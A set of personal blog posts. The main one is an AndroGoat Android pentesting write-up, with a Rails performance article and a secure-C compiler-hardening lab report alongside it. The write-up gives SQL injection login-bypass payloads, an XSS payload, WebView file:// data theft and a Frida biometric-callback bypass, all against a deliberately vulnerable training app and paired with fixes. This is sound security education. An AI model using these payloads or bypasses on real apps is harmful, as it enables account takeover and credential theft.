(Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) EnvironmentCompat.MEDIA_UNKNOWN, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;emulator\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;sdk\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;vbox\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails,
(CharSequence) \u0026#34;genymotion\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;x86\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;goldfish\u0026#34;, false, 2, (Object) null) || StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;test-keys\u0026#34;, false, 2, (Object) null); } Recommendations # 1. Robust Device Integrity\nDefense in Depth: Treat root and emulator checks as hardening only, not as a primary security control. Back‑end authorization and server‑side controls must not trust these checks.\nEnhanced Root Detection: If you still want stronger detection, use multiple root indicators instead of a single su path list. This includes:\nMount options and build tags.\nKnown root apps and writable system paths.\nSELinux state and dangerous system properties.\nMulti-Factor Emulator Detection: Complement string‑based emulator checks with:\nSensor anomalies: Identifying a lack of GPS or accelerometer patterns.\nTelephony inconsistencies: Checking for IMEI/SIM anomalies.\nEnvironment checks: Searching for emulator‑specific files and properties.\nAttestation Services: Consider using Google Play Integrity API (or SafetyNet Attestation) to get a server‑validated signal of device integrity.\n2. Runtime Protection\nAnti-Instrumentation: Increase resistance against dynamic instrumentation: Obfuscation: Obfuscate critical classes and methods, including your isEmulator and root check logic. Anti-Hooking: Add basic anti‑debugging and anti‑hooking checks (e.g., Frida detection, debugger presence, and tamper checks on Build.* values). 3. 
android:debuggable # In a real app, android:debuggable should be false in the release manifest and controlled via Gradle build types, so only debug builds are debuggable and the Play Store APK ships with debugging disabled.\nSetting it to true makes it easier for an attacker to learn how the app works, pause the app and modify its code while it is running, or recompile it with additional vulnerabilities.\nGoal: Prevent dynamic analysis tools from hooking and manipulating the app.\n4. Insecure Data Storage # In AndroGoat, the same sensitive information (usernames and passwords) is written to multiple storage locations on the device: Shared Preferences, SQLite databases, temporary files and even external storage. None of these locations are encrypted. This means that anyone who can get filesystem access (stolen device, rooted device, adb/run-as, or a malicious app with storage permissions) can trivially dump and read these values without needing to break any cryptographic algorithms.\nShared Preferences # The app stores the username and password in user.xml under /data/data/owasp.sat.agoat/shared_prefs. This file is just an XML key/value store. On a normal (non‑rooted) device it is only readable by the app’s UID, but:\nOn a rooted device or emulator, I can simply cat this file or pull it off the device. With run-as owasp.sat.agoat (and android:debuggable=true), I can also access it from adb without full root. So even though Shared Preferences feels like a “private” store, it is not secure enough for raw credentials.\nSQLite # Android apps use SQLite for structured data storage (similar to a standard SQL database).\nThe Vulnerability: Standard SQLite databases are not encrypted. If an attacker gains access to the device (physically or via malware with root access), they can copy the .db file and read all contents.\nThe same problem appears again in the SQLite database under /data/data/owasp.sat.agoat/databases.
SQLite gives you structure, not security. By default there is no encryption on the .db file, so once I have a copy of that file I can open it in DB Browser for SQLite and read all user records in clear text.\nIn this app, I was able to export the database directory and see all stored usernames and passwords immediately, without any brute‑forcing or reversing.\nTemp File # The application is also writing temporary files under /data/data/owasp.sat.agoat. Temp files are often forgotten by developers, but from an attacker’s point of view they are just another place to look for credentials or session data. If these files are not securely deleted, they can survive longer than intended and become an easy loot bag on a rooted device.\nExternal Storage / SD Card # Since the app declares READ_EXTERNAL_STORAGE in the manifest, we can read from external storage. Upon checking the app’s sdcard location, /sdcard/Android/data/owasp.sat.agoat/files, I found the tmp file with the credentials. In other words, the app leaks credentials into external storage.\nExternal storage is shared space: any other app with READ_EXTERNAL_STORAGE (or broad storage access on older Android versions) can read these files. So at this point, a low‑privileged malicious app installed on the same device can read the tmp file with credentials, without needing root at all.\nRecommendations # For a real app, the safer pattern is:\nAvoid storing raw passwords or long‑lived secrets on disk at all. Store only what you absolutely need (for example short‑lived access tokens instead of credentials). If you need to persist sensitive data, use Android’s EncryptedSharedPreferences or a similar wrapper instead of plain XML, and use an encrypted database solution (or store only hashed values with a strong KDF and salt) rather than a clear‑text SQLite file. Do not write credentials to temporary files. If a temp file is unavoidable, keep it in internal cache and delete it immediately after use.
Never write secrets to external storage / SD card. Treat external storage as untrusted and world‑readable. If you must store something there, encrypt it first with a key held in the Android Keystore and never store the key next to the data. 5. Input Validations # The \u0026ldquo;Golden Rule\u0026rdquo; of OWASP is that client-side validation is for user experience, but server-side validation is for security. AndroGoat deliberately breaks this rule in a few places: SQL queries are built by string concatenation, HTML is rendered without sanitisation, and WebView is allowed to load almost anything the user types. This makes it very easy to turn normal user input into executable code on the device.\n1. SQL Injection # SQL injection happens because the app processes user input as code by concatenating it directly into a SQLite query. Content Providers are especially prone to SQL injection since their data is shared with other apps, e.g., contacts. Successful compromise of the SQLite databases leads to corruption, deletion or exfiltration of data.\nBypassed with payloads such as ' OR '1'='1 or ' OR 1=1 -- and the vulnerable piece of code is here: String qry = \u0026quot;SELECT * FROM users WHERE username='\u0026quot; + ((Object) $username.getText()) + \u0026quot;'\u0026quot;; because we are appending unsanitised user input to the SQL query by string concatenation.\nIn practice this means I can log in as any user I want, or dump large parts of the users table, without knowing a valid password.\nSolution: # Use prepared statements / parameterised queries when passing user input into SQLite so that the input is always treated as data and not as part of the SQL syntax.\n2. XSS # XSS allows an attacker to execute arbitrary JavaScript code in the context of the WebView.
Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change the appearance of a web page, or perform phishing and drive-by-download attacks.\nSource of the vulnerability: webSettings.setJavaScriptEnabled(true);. By default, Android WebView does not execute JavaScript. Explicitly setting this to true allows the script tags inside the HTML content to run.\nCompromise using the JavaScript payload: \u0026lt;img src=x onerror=alert(\u0026lsquo;XSS\u0026rsquo;)\u0026gt; 3. WebView # Caused by unvalidated, unrestricted WebView URL loading:\nwebViewSettings.setJavaScriptEnabled(true); //1 webViewSettings.setAllowFileAccess(true); //2 webViewSettings.setAllowContentAccess(true); webViewSettings.setAllowFileAccessFromFileURLs(true); //3 webViewSettings.setAllowUniversalAccessFromFileURLs(true); String url = $urlEditText.getText().toString(); $webView.loadUrl(url); //4 The code above allows an attacker to do the following:\nCross-Site Scripting (XSS) if the user loads a malicious page (1). Local File Inclusion: the WebView can access the Android file system using the file:// scheme (2, 3), e.g. file:///data/data/owasp.sat.agoat/shared_prefs/, so JavaScript running in a file-scheme context (e.g., file:///sdcard/exploit.html) can dump shared preferences.\nsetAllowUniversalAccessFromFileURLs disables the Same-Origin Policy (SOP) for file schemes: it allows a script running in a local file to make requests to any origin (including the internet or other local files) and read the response. Finally, the app loads the user input directly into the WebView without any validation, with universal file access enabled (4).\nRecommendations # Validate and sanitise all user input on the server side, and never build SQL queries by string concatenation. Always use parameterised queries or prepared statements. For XSS, avoid rendering untrusted HTML directly.
If a WebView is required, keep setJavaScriptEnabled(false) unless there is a strong reason, and sanitise any HTML you do render. Lock down WebView usage: restrict loadUrl to a small whitelist of trusted domains, disable setAllowFileAccessFromFileURLs and setAllowUniversalAccessFromFileURLs unless absolutely necessary, and do not allow user-controlled file:// URLs. 6. Side-Channel Data Leakage # This is how sensitive information can be leaked through the Android operating system\u0026rsquo;s features, rather than through a direct flaw in the app\u0026rsquo;s code or network. In other words, nothing is “hacked” in the classic sense; the app is simply not marking sensitive fields correctly or is writing secrets to places where the OS can see and reuse them.\nWhen you type information into standard EditText fields on Android, the operating system\u0026rsquo;s keyboard (like Gboard or Samsung Keyboard) attempts to \u0026ldquo;learn\u0026rdquo; your typing habits to offer autocorrect suggestions and predictions. To do this, it stores the words you type in a local dictionary or cache.\nIf an application does not explicitly tell the OS \u0026ldquo;This field contains sensitive data\u0026rdquo; (for example by using a password input type), the keyboard will cache sensitive data. An attacker who gains physical access to the device or a malicious app with access to the user dictionary can extract this data.\n1. Keyboard Cache # Android keyboards (Input Method Editors or IMEs) utilize a user dictionary to provide auto-correction and predictive text. By default, any text typed into a standard EditText field is added to this dictionary. In AndroGoat, the password field is defined using a standard EditText, so if I start typing my password, the cached value I previously entered is shown in the suggestions:\n2. Insecure Logging # The app writes the raw password to Logcat, which violates GDPR requirements.\n3. Clipboard Vuln # The OTP code is copied to the clipboard.
In Android, clipboard data has long been readable by other apps: before Android 10, any app could read the clipboard even in the background, and on newer versions the focused app or the default keyboard can still read it.\nThe attack: A malicious app can constantly monitor the clipboard. As soon as your app generates the OTP and puts it on the clipboard, the malicious app grabs it and exfiltrates it, for example, to a remote server. This allows attackers to bypass 2FA.\nRecommendations # For keyboard cache, mark sensitive fields correctly (e.g. use android:inputType=\u0026quot;textPassword\u0026quot; and android:importantForAutofill=\u0026quot;no\u0026quot; or \u0026quot;noExcludeDescendants\u0026quot;) so that the OS does not learn or suggest secrets. Never log secrets. Avoid writing passwords, OTPs or tokens to Logcat; if you need logging, log high‑level events only (e.g. \u0026ldquo;login failed\u0026rdquo;) and strip sensitive values. Avoid putting OTPs or passwords on the clipboard. Where possible, auto‑fill the value inside the app instead of copying it, or at least clear the clipboard immediately after use and warn users that clipboard data can be read by other apps. 7. Biometric Authentication # Biometric authentication includes the fingerprint reader and the camera for facial recognition. In Android, biometrics can be used in two very different ways: either just as a convenience \u0026ldquo;unlock\u0026rdquo; (a boolean callback that says success/fail), or as a way to unlock a real cryptographic key from the Android Keystore.\nThe flaw: In this app, biometrics are only used in the first, weak way. The code just listens for the onAuthenticationSucceeded callback and, if it fires, treats the user as fully authenticated. No cryptographic key is unlocked, no token is signed, and nothing is bound to the hardware. The app is basically saying: \u0026ldquo;If Android tells me success, I will trust it blindly.\u0026rdquo;\nThe exploit: Because there is no cryptographic proof, I can use Frida to fake that callback.
Instead of presenting a real finger, I hook the biometric flow and manually trigger success:\nI attach Frida to the process and hook BiometricPrompt.authenticate() / the callback path. When the app requests a fingerprint and waits for onAuthenticationSucceeded, my script intercepts the call and immediately invokes the success path. From the app\u0026rsquo;s point of view, it looks exactly like a genuine fingerprint match, but no real biometric was used and the user never touched the sensor.\n","date":"3 February 2026","permalink":"/njeri/posts/androgoat/","section":"Posts","summary":"Android Pentesting # To sharpen my skills, I recently took a deep dive into AndroGoat, a deliberately insecure Android application designed to showcase the most common OWASP Mobile Top 10 vulnerabilities.\nIn this post, I’ll walk through how I combined static and dynamic analysis to uncover hardcoded secrets, bypass security checks with Frida, and extract sensitive data from local storage.\nMy pentesting toolkit included:\nJadx-GUI: For decompiling and reading Java/Kotlin source code.\nAndroid Debug Bridge (adb): The \u0026ldquo;command line\u0026rdquo; for interacting with the emulator in Android Studio.\nFrida: For dynamic instrumentation.
Instrumentation is the art of injecting new functionality into the application at runtime e.","title":"Android Pentesting with AndroGoat"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/database/","section":"Tags","summary":"","title":"database"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/database-security/","section":"Tags","summary":"","title":"database security"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/mobile/","section":"Tags","summary":"","title":"mobile"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/mobile-pentest/","section":"Tags","summary":"","title":"mobile pentest"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/pentest/","section":"Tags","summary":"","title":"pentest"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/security/","section":"Tags","summary":"","title":"security"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/security/","section":"Categories","summary":"","title":"security"},{"content":"Learning Transformers (Next 4 weeks)\nWorking through the ARENA Transformer Interpretability course to deepen my understanding of transformer architectures and mechanistic interpretability.\nPenetration Testing\nCurrently pentesting vulnerable mobile applications to strengthen my security assessment skills.\n","date":"19 December 2025","permalink":"/njeri/now/","section":"","summary":"Learning Transformers (Next 4 weeks)\nWorking through the ARENA Transformer Interpretability course to deepen my understanding of transformer architectures and mechanistic interpretability.\nPenetration Testing\nCurrently pentesting vulnerable mobile applications to strengthen my security assessment skills.","title":"Now"},{"content":"Users desire apps that run smoothly, load fast, and don\u0026rsquo;t crash.
But what determines an app\u0026rsquo;s performance? There are two key factors: performance and memory footprint. Performance refers to how fast your app loads for users. Memory footprint is the amount of system memory your app uses. If your app is slow or hogs too much memory, users won\u0026rsquo;t stick around. That\u0026rsquo;s where optimizing your Ruby on Rails app becomes essential.\nIn this article, we\u0026rsquo;ll explore techniques that enhance performance and reduce memory usage, ensuring user satisfaction and the success of your app.\nUnderstanding performance and memory footprint # The performance of an app refers to how fast your app loads for the end-users. As a developer, app performance should always be a priority even as you are adding new features and architecting your app.\nMemory footprint refers to how much system memory or RAM space your app uses while it\u0026rsquo;s running. Most computers have a finite amount of memory; therefore, excessive memory usage can lead to freezing or crashes, degrading the user experience. Developers must find ways to minimize their app\u0026rsquo;s memory footprint.\nGoals of optimization # The main goals of optimizing memory use and app performance are:\nUser satisfaction. Your goal as a developer is to get as many users as possible to use your app and to ensure that they enjoy interacting with the app. Business Scalability. Optimized performance and reduced memory usage enable your business to scale, attracting more customers and generating revenue. It validates your efforts as a developer, ensures wider adoption of your technology, and keeps investors happy. But how do you optimize your Rails app?
In the next section, you\u0026rsquo;ll learn about various techniques you can use to optimize the performance and memory usage of your app:\nTechniques for optimization # Lazy loading # Lazy loading involves loading webpage components on demand, as the user needs them, rather than downloading the entire webpage at once. This prevents noticeable lagging while webpage content gets downloaded. For example, a blogging app could be architected to dynamically load posts as the user scrolls, preventing memory overload. For instance:\n# articles_controller.rb class ArticlesController \u0026lt; ApplicationController def index @articles = Article.limit(10) # Load only 10 articles initially end # Load more articles when the user clicks on the load more button def load_more_articles @articles = Article.limit(10).offset(params[:offset]) render partial: \u0026#39;articles/article\u0026#39;, collection: @articles end end In Rails, you should write your code so that data is queried from your database as required. The fewer the SQL queries made to the database at a time, the better the app\u0026rsquo;s performance. Alternatively, you can perform all the heavy database queries in the background so as not to freeze the UI.\nLazy loading leads to quicker initial load time and doesn\u0026rsquo;t hog server/client resources every time users access the app.\nOptimize your database queries # Writing inefficient database queries slows down apps and leads to excessive memory consumption, both of which degrade the app\u0026rsquo;s performance. In Rails, N+1 queries are a major performance problem. They occur when you query the database multiple times for related records, resulting in slower response times. For example, in your blog app, you may have two models: Article and Comment.
N+1 will occur when you write two queries: one to fetch a list of all articles and another to fetch all the comments associated with each article.\n# Fetch all the articles articles = Article.all # Loop through all the articles and find the number of comments articles.each do |article| count = article.comments.count end To optimize N+1 queries:\nUse the Bullet gem to help detect the N+1 queries in your apps. Use Active Record\u0026rsquo;s eager loading to write memory-efficient database queries. Active Record has an eager_load function that gets all the associated data using a left outer join to combine the requests into a single query. To make the code snippet above performant, you should use articles = Article.includes(:comments) to fetch articles and associated comments in a single query. Use indexes to reduce how much data your queries need to read and process from the database. Indexed queries reduce query response time and make it easier to scale an app without affecting its performance. Use Active Record to cache recent queries. Therefore, instead of fetching data from the database for all subsequent similar requests, it\u0026rsquo;s best to fetch the data from the Active Record cache. Optimizing database queries is crucial for app performance. By using Active Record\u0026rsquo;s eager loading, indexing smartly, and leveraging cache, you can significantly boost your app\u0026rsquo;s speed and efficiency.\nUse memory profiling tools # Memory profiling tools monitor and identify memory leaks in an app that could lead to lagging or crashing. Ruby uses a Garbage Collector to automatically allocate and deallocate memory from objects, which optimizes memory. However, sometimes the Garbage Collector fails to deallocate memory from objects that are no longer being used, leading to memory leaks.
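Before reaching for a full profiler, you can see the raw signal such tools build on in plain Ruby (no gems; the Session class here is a made-up stand-in for any object your app caches): ObjectSpace can count how many instances of a class are still reachable and therefore cannot be garbage-collected.

```ruby
# Session is a hypothetical class standing in for any cached object.
class Session; end

# Simulate a cache that keeps 500 sessions reachable.
sessions = Array.new(500) { Session.new }

GC.start # reclaim anything that is no longer referenced

# Count the Session instances that survived collection.
live = ObjectSpace.each_object(Session).count
puts live >= sessions.length # all 500 are still referenced, so none were freed
```

A leak shows up as this count climbing over time for objects you expected to have been released.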
You therefore need to use a memory profiler tool or memory profiler gems such as ruby-prof to identify which objects are in use and how much memory is allocated to each.\nFor instance, you can use the built-in Ruby profiler by running ruby -rprofile script.rb, which tells Ruby to require the profile library and then run the script.rb file. Once the script is executed successfully or you kill the ruby process, the profile library will print out a performance profile on your terminal. You can then use a profiling tool to identify methods and parts of code that cause the highest memory usage and fix these memory issues.\nCaching # Caching is the practice of storing the response data returned from the server when a request is made and reusing the data for similar requests. The more requests you make to the server, the slower the app gets, especially as the app grows and the data being fetched increases. Caching is the most effective way of improving your app\u0026rsquo;s performance.\nThe following are some caching techniques you can use in your Rails apps:\nMemory caching. Rails has built-in caching which lets you cache your fragments, pages, and actions to reuse when responding to requests. Rails provides fragment caching by default, and to add page and action caching, you\u0026rsquo;ll need to add actionpack-page_caching and actionpack-action_caching gems to your Gemfile. Rails will fetch the views, pages, or actions from the cache store as opposed to making a request to the server, reducing app latency significantly and improving performance and scalability.\nMemoizing expensive computations. Memoization is a technique used in Ruby to speed up accessor methods by caching their results. For example:\ndef current_user @current_user ||= User.find(user_id) end Using the ||= memoization pattern, you cache the database query result in @current_user after the first time the method is invoked.
All the subsequent calls reuse the value stored in the @current_user instance variable. The ||= operator means that if the @current_user instance variable is already set (not nil or false), return its value without evaluating the right-hand side of the expression; otherwise, evaluate the expression on the right and store the result. This improves performance by caching expensive method calls.\nRemove unused Gems # Each Rails gem consumes some memory during startup, causing memory bloat and slowing down your app. You should occasionally check how much memory your gems use with the derailed_benchmarks gem. Add gem 'derailed_benchmarks', group: :development to your Gemfile, then run bundle exec derailed bundle:mem and from the output identify gems consuming excessive memory and consider replacing them with lightweight alternatives. In my output, papertrail consumed the most memory on startup out of all the gems, so it would be the first candidate to replace with a lighter alternative.\nUse CDN to reduce latency # A Content Delivery Network (CDN) refers to a geographically distributed group of servers that caches app data closer to the users. CDNs solve the latency problem (the time between when an app requests data and when the server\u0026rsquo;s response is rendered to the end-user) in the following ways:\nThey reduce app load time by letting users connect to the server geographically closest to them. CDNs also offer load balancing, evenly distributing incoming traffic among multiple backend servers so that no single server is overloaded, which improves app performance. Conclusion # Optimizing your Ruby on Rails app is crucial for keeping users engaged and your business growing.
By implementing techniques like lazy loading, optimizing database queries, using memory profiling tools, caching data, removing unused gems, and leveraging CDNs, you can ensure your app runs smoothly and efficiently. Don\u0026rsquo;t forget to monitor and fine-tune your app regularly to maintain peak performance. Start optimizing today to provide the best experience for your users and unlock your app\u0026rsquo;s full potential.\n","date":"24 January 2025","permalink":"/njeri/posts/rails-memoryfootprint/","section":"Posts","summary":"Users desire apps that run smoothly, load fast, and don\u0026rsquo;t crash. But what determines an app\u0026rsquo;s performance? There are two key factors: performance and memory usage. Performance refers to how fast your app loads for users. Memory footprint is the amount of system memory your app uses. If your app is slow or hogs too much memory, users won\u0026rsquo;t stick around. That\u0026rsquo;s where optimizing your Ruby on Rails app becomes essential.\nIn this article, we\u0026rsquo;ll explore techniques that enhance performance and reduce memory usage, ensuring user satisfaction and the success of your app.\nUnderstanding performance and memory footprint # The performance of an app refers to how fast your app loads for the end-users.","title":"Optimizing your Ruby on Rails app for improved performance and reduced memory footprint"},{"content":"","date":"24 January 2025","permalink":"/njeri/tags/ruby-on-rails/","section":"Tags","summary":"","title":"Ruby on Rails"},{"content":"The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. 
Additionally, we will analyze the code using a static security analysis tool (cppcheck) to uncover vulnerabilities in the code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations. The goal is to deliver a secure, improved program with a detailed report on the analysis, changes, and recommendations.\nLink to the Lab resources on Github # Lab 2 and Lab 3\nAnalysis Method (cppcheck) # Since we are provided with the source code, we try to identify potential threats in it with a static code analysis tool, cppcheck.\nFirst, we extracted the provided files using the given instructions. We then ran cppcheck on the program and identified the following issues: Variable Scope Issues: The variables in0 and in1 in src/main.c have unnecessarily wide scopes, which may lead to unintended use or harder code maintenance. Unsafe Use of scanf(): In src/validation/validation_functions.c, scanf(\u0026quot;%s\u0026quot;, buffer) lacks a field width limit, making it vulnerable to buffer overflows when given excessively large input. Unused Function: The function fnR in src/action/action_functions.c is never called, indicating potential dead code, which can increase codebase complexity or lead to latent issues if not properly reviewed. Given the program\u0026rsquo;s small size, we could conduct manual security code reviews against secure coding standards and write test programs to identify common vulnerabilities. However, since a Makefile compiles multiple files together, manually reviewing each file one by one becomes impractical in real-world scenarios. Therefore, we propose starting with static analysis for a more efficient and thorough approach. 
Legacy Options # Finding the Original Compiler Options (LEGCFLAGS) Leading to Vulnerabilities # checksec is a Linux tool that analyzes binary files to identify security features enabled during compilation and linking, such as RELRO, NX, PIE, Stack Canary, and FORTIFY_SOURCE. To infer the legacy compiler flags (the Makefile\u0026rsquo;s LEGCFLAGS) used to build the door-locker binary from the given checksec output, we analyze the provided information step by step: Breakdown of checksec Output: # RELRO: Partial RELRO Indicates that the binary is compiled with -Wl,-z,relro but not with -Wl,-z,now. This provides partial protection against GOT overwrite attacks. At first we only configured -Wl,-z,relro; however, Full RELRO was still always enabled, so we suspected that -Wl,-z,now is applied by default and took the extra step of disabling it with -Wl,-z,lazy to enforce lazy symbol resolution, which is required for Partial RELRO. STACK CANARY: No canary found Suggests the binary was not compiled with -fstack-protector or similar flags. This makes it vulnerable to stack-based buffer overflows. NX (No Execute): Enabled The binary is compiled with -Wl,-z,noexecstack or equivalent, which prevents code execution on the stack. PIE (Position-Independent Executable): Enabled Indicates the binary was compiled with -fPIE -pie. This allows address randomization, enhancing security against exploits. RPATH and RUNPATH: Not set The binary has no hardcoded runtime library search paths, indicating good practice. Symbols: (45) Symbols Indicates the binary includes some debug symbols or symbol table information, possibly due to compilation with -g or because symbols were not stripped. FORTIFY: No The binary lacks fortification, so we configured it explicitly with -D_FORTIFY_SOURCE=0. 
Likely Legacy Options: # Based on the above, the likely compiler flags are:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Running checksec after building with these flags produced the identical security configuration to the binary file provided in Lab 1. These flags explain the security features observed:\n-fPIE -pie: For PIE enabled. These flags enable Position-Independent Executable (PIE), making the executable\u0026rsquo;s code location-independent, which allows the OS to load it at different memory addresses for better security (such as enabling Address Space Layout Randomization, ASLR). -D_FORTIFY_SOURCE=0: For No Fortify. This disables the FORTIFY_SOURCE security feature, which normally enhances the security of certain string and memory operations by checking for buffer overflows at compile time. -fno-stack-protector: For No Canary Found. This flag disables stack protection mechanisms (canary values) that are used to detect and prevent stack buffer overflows during execution. -Wl,-z,relro \u0026amp; -Wl,-z,lazy: For Partial RELRO. The -z,relro flag enables read-only relocation (RELRO) to protect the Global Offset Table (GOT) from modification, while -z,lazy ensures that symbol resolution is deferred until needed, allowing for Partial RELRO. -Wl,-z,noexecstack: For NX enabled. This flag prevents the stack from being executable, mitigating the risk of certain types of attacks, such as buffer overflows that attempt to execute code from the stack (NX or No Execute protection). 
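As a sanity check, the PIE result can also be confirmed straight from the ELF header, without checksec. A small sketch (assuming a Linux system; /bin/ls is used here as a stand-in for the analyzed binary):

```shell
# Byte 16 of an ELF file holds e_type: 2 = EXEC (non-PIE executable),
# 3 = DYN (PIE executable or shared object). readelf -h reports the
# same field on its "Type:" line.
etype=$(od -An -tu1 -j16 -N1 /bin/ls | tr -d ' ')
echo "e_type=$etype"
```

On distributions where /bin/ls is built as a PIE (the default for modern gcc), this prints e_type=3.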
Analyze Binary in Ghidra # Compilation options used for LEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Original Binary for main function (Lab 1) int main(int argc,char **argv) { long lVar1; long lVar2; int iVar3; if (argc == 3) { iVar3 = validate(argv); if (iVar3 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar1 = strtol(argv[2],(char **)0x0,10); lVar2 = strtol(argv[1],(char **)0x0,10); iVar3 = 0; if (lVar2 == lVar1) { puts(\u0026#34;Valid access.\u0026#34;); fngrt(); } else { fnr(); } } else { fnr(); iVar3 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar3 = 1; } return iVar3; } New Binary for main function (Lab 2) int main(int argc,char **argv) { int iVar1; int iVar2; long lVar3; long lVar4; if (argc == 3) { iVar1 = validate(argv); if (iVar1 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar3 = strtol(argv[2],(char **)0x0,10); lVar4 = strtol(argv[1],(char **)0x0,10); iVar2 = fnchck((int)lVar4,(int)lVar3); iVar1 = 0; if (iVar2 == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); iVar1 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar1 = 1; } return iVar1; } Overview # Two binary files, produced from slightly differing versions of source code, were analyzed. Despite identical checksec results indicating similar security configurations, functional discrepancies were observed. This report outlines the differences, potential causes, and investigative steps taken to identify the reasons behind the variations.\nKey Observations # Logic Differences in Validation:\nFirst Binary: Directly compares two long values using if (lVar2 == lVar1) to determine success. fnchck is included in the project but never called. Second Binary: Introduces a new function, fnchck, which takes the casted integer values of lVar3 and lVar4 as arguments. 
Success is determined by the condition if (fnchck(...) == 0xf). Finding: The second binary includes an additional layer of logic not present in the first.\nVariable Usage and Type Casting:\nBoth binaries use long variables for storing input values. The second binary explicitly casts these long values to int when calling fnchck. Finding: Type casting was introduced in the second binary, potentially as part of an additional validation mechanism.\nCommon Functionality:\nBoth binaries call fngrt() upon success and fnr() upon failure. However, the success criteria differ due to the logic variations described above. Finding: Core functionality remains similar, but validation mechanisms differ.\nPotential Causes of Differences # Source Code Variations: The inclusion of fnchck in the second binary suggests either a different version of the source code or manual modification. Conditional Compilation: Preprocessor directives such as #ifdef or #define may have enabled or disabled specific sections of code during compilation. Compiler or Optimization Settings: Compiler flags (e.g., -O2, -O3) may have introduced optimizations or modifications in one binary but not the other. However, optimizations typically simplify logic rather than adding new functions like fnchck. Linker Behavior or Library Dependencies: Differences in the linker scripts, library versions, or included dependencies might have affected the compiled output. Investigative Steps Taken # Compilation Flags: The compilation process for both binaries was analyzed with verbose options (gcc -v and ld --verbose) to identify differences in flags. Special attention was paid to optimization levels and security-related flags. Disassembly Analysis: Using objdump -d, the assembly-level differences between the two binaries were reviewed. This revealed the introduction of fnchck and its associated logic in the second binary. 
Preprocessor Directives: The source code was inspected for conditional compilation directives (e.g., #ifdef) that could enable or disable sections of the code. Controlled Recompilation: Various combinations of compiler and linker flags were tested to replicate the logic in both binaries, including: Adjusting optimization levels (-O0, -O2, -O3). Explicitly enabling or disabling RELRO (-Wl,-z,relro or -Wl,-z,now). Original Binary for validate function (Lab 1)\nvoid validate(int param_1) { char local_20 [24]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,*(undefined4 *)(param_1 + 4), *(undefined4 *)(param_1 + 8)); __isoc99_scanf(\u0026amp;DAT_00012057,local_20); strcmp(local_20,\u0026#34;Y\u0026#34;); return; } New Binary for validate function (Lab 2) int validate(char **argv) { uint uVar1; int iVar2; char buffer [20]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,argv[1],argv[2]); __isoc99_scanf(\u0026amp;DAT_0010204b,buffer); uVar1 = strcmp(buffer,\u0026#34;Y\u0026#34;); if (uVar1 != 0) { iVar2 = strcmp(buffer,\u0026#34;y\u0026#34;); uVar1 = (uint)(iVar2 != 0); } return uVar1; } The primary differences seem to be due to code-level changes rather than differences in compiler flags. However, certain flags like -fstack-protector, -O2, or -O3 could potentially influence buffer allocation, optimization, or even removal of unused code, but they are not directly responsible for the changes in logic and structure between the two versions. The second version appears to be a more robust implementation, checking both uppercase and lowercase \u0026quot;Y\u0026quot; inputs and correctly using the result of the comparison.\nSecured Makefile Configuration # 1. LEGCFLAGS = -fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector # -fpie: This flag enables the creation of position-independent executables (PIE). 
This improves security by enabling Address Space Layout Randomization (ASLR), making it harder for attackers to predict the memory layout of a program. -D_FORTIFY_SOURCE=0: This disables the \u0026ldquo;fortify\u0026rdquo; source feature, which provides additional compile-time checks to enhance security. By setting this to 0, the program won\u0026rsquo;t benefit from additional security features such as bounds checking for certain functions like strcpy, memcpy, etc. Recommendation: Remove this flag or set it to 2 (the highest level of fortification). Setting it to 0 reduces the security checks and can make your application more vulnerable to buffer overflow attacks. -fno-stack-protector: This disables stack protection, which is typically used to detect and prevent buffer overflow attacks by placing \u0026ldquo;canaries\u0026rdquo; on the stack. Recommendation: Remove this flag. Disabling stack protection weakens security by making it easier for attackers to exploit stack buffer overflows. Keep -fstack-protector or use -fstack-protector-strong (which is a more secure version). 2. LEGLDFLAGS = -pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack # -pie: This flag creates a position-independent executable, which works together with ASLR to randomize the memory layout, improving security. -Wl,-z,relro: This flag enables \u0026ldquo;Read-Only Relocation\u0026rdquo; (RELRO), which makes it harder for an attacker to modify function pointers after the 